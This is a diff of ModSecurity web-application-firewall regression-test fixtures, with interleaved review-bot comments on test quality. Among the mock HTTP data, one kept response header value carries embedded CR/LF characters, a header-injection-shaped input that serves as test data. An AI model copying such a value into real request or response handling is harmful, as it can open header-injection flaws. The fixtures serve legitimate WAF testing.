@@ -1,78 +1,234 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (1/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (1/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":403 + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'900001',phase:request,nolog,status:403,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (2/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (2/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":404 + "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (3/n)", - "expected":{ - "http_code":404 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (3/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + 
"http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,block,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (4/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (4/n)", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,nolog,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (5/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (5/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] }, - "rules":[ + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,pass,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (6/n)", - "expected":{ - "http_code":403 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (6/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": 
{ + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,drop,nolog,t:none\"" ] diff --git a/test/test-cases/regression/action-exec.json b/test/test-cases/regression/action-exec.json index 80661114e0..c6fe77d09d 100644 --- a/test/test-cases/regression/action-exec.json +++ b/test/test-cases/regression/action-exec.json 
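Review bot: All six cases now spell out a degenerate request (`"uri": ""`, `"method": ""`, empty `ip`, `port` 0) that the old file simply omitted, which grows the file from 78 to 234 lines without testing anything new. Whether the loader treats these empty strings exactly like absent keys is not visible in this hunk, so the expected `http_code` values should be re-run against the rewritten file, not assumed. If the blocks must be explicit, a well-formed request line such as `"uri": "/"` and `"method": "GET"` would exercise the disruptive actions on input closer to what the engine sees in production. Otherwise the format mode could leave out blocks that only contain defaults.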
@@ -1,148 +1,162 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (1/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + 
}, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"", - "parser_error":"exec: Expecting a Lua script: /bin/ech" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200, + "parser_error": "exec: Expecting a Lua script: /bin/ech" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,exec:/bin/echo\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": 
"no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/test.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/test.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/test.lua\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (3/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 
Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/match.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/match.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/match.lua\"" ] } ] - diff --git a/test/test-cases/regression/action-expirevar.json b/test/test-cases/regression/action-expirevar.json index 5c9d4ddfd4..f105a1929d 100644 --- a/test/test-cases/regression/action-expirevar.json +++ b/test/test-cases/regression/action-expirevar.json 
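Review bot: In all three cases the response header `"Content-Length": "length\n\r"` is rewritten to `"Content-Length": "0"`, while the neighbouring `"Content-Type": "text/xml; charset=utf-8\n\r"` keeps its trailing `\n\r`. If the non-numeric value with embedded CR/LF was a deliberate malformed-header fixture, the automatic rewrite silently removes that negative coverage. In that case it belongs in a dedicated case that the Content-Length update skips. If it was only a placeholder, the Content-Type value should be cleaned at the same time, `"Content-Type": "text/xml; charset=utf-8",`, so the fixture does not carry a header-injection-shaped value by accident. Separately, case (1/3) now lists `"http_code": 200` next to `parser_error`; presumably no transaction runs when rule parsing fails, so that expectation looks unverifiable and is better dropped.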
@@ -1,29 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (1/x) - ip, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 100" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (1/x) - ip, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 100", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5000,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5001',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=60,pass\"", 
@@ -31,30 +44,43 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (2/x) - ip, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is " - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (2/x) - ip, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5010,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5011',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=0,pass\"", 
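Review bot: The "expire immediately" expectation `"debug_log": "Saving msg: mycount1 is "` is a prefix of the "expire later" output `Saving msg: mycount1 is 100`, so it would still match if `expirevar:ip.mycount1=0` failed to expire the variable. The same applies to case (4/x) in the last hunk of this file, whose `"Saving msg: mycount1 is"` is a prefix of `mycount1 is 12`. The harness appears to match `debug_log` with a regex search, so anchoring the pattern would make the assertion meaningful, e.g. `"debug_log": "Saving msg: mycount1 is $"`, assuming the message ends the logged line. The rule that emits the message lies outside this hunk, so that assumption should be confirmed there. The added `"http_code": 200` does not tighten this, since every rule shown uses `pass`.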
@@ -62,30 +88,43 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (3/x) session, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 12" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (3/x) session, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 12", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=30\"", 
@@ -93,30 +132,43 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (4/x) session, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (4/x) session, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=0\"", diff --git a/test/test-cases/regression/action-id.json b/test/test-cases/regression/action-id.json index 9f9453c7e9..39370d30e5 100644 --- a/test/test-cases/regression/action-id.json +++ b/test/test-cases/regression/action-id.json 
@@ -1,264 +1,276 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "The input \"111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666\" does not seems to be a valid rule id." 
}, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "File: action-id.json. Line: 2. Column: 56. 
Expecting an action, got: id:-1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:-1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1,phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1',phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (5/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (5/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. 
Expecting an action, got: id:'1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (6/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (6/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. Expecting an action, got: ',phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1',phase:2,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-initcol.json b/test/test-cases/regression/action-initcol.json index 5051f2e6a5..3ab79876b5 100644 --- a/test/test-cases/regression/action-initcol.json +++ b/test/test-cases/regression/action-initcol.json 
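Review bot: In cases 1/6, 2/6, 5/6 and 6/6 the new `"http_code": 200` sits beside a `parser_error` expectation, where the rule set is rejected at load time and presumably no transaction is ever processed. The status expectation therefore cannot be exercised, and it reads as if a request were served with 200 under rules that failed to parse. If the formatter writes the field unconditionally, it would be clearer to omit it whenever `parser_error` is present, leaving `"expected": { "parser_error": "..." }`. The same pairing appears in the "skip action 2/3" case of action-skip.json.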
@@ -1,30 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing initcol action", - "expected":{ - "debug_log": "Saving variable: IP:auth_attempt with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing initcol action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: IP:auth_attempt with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" 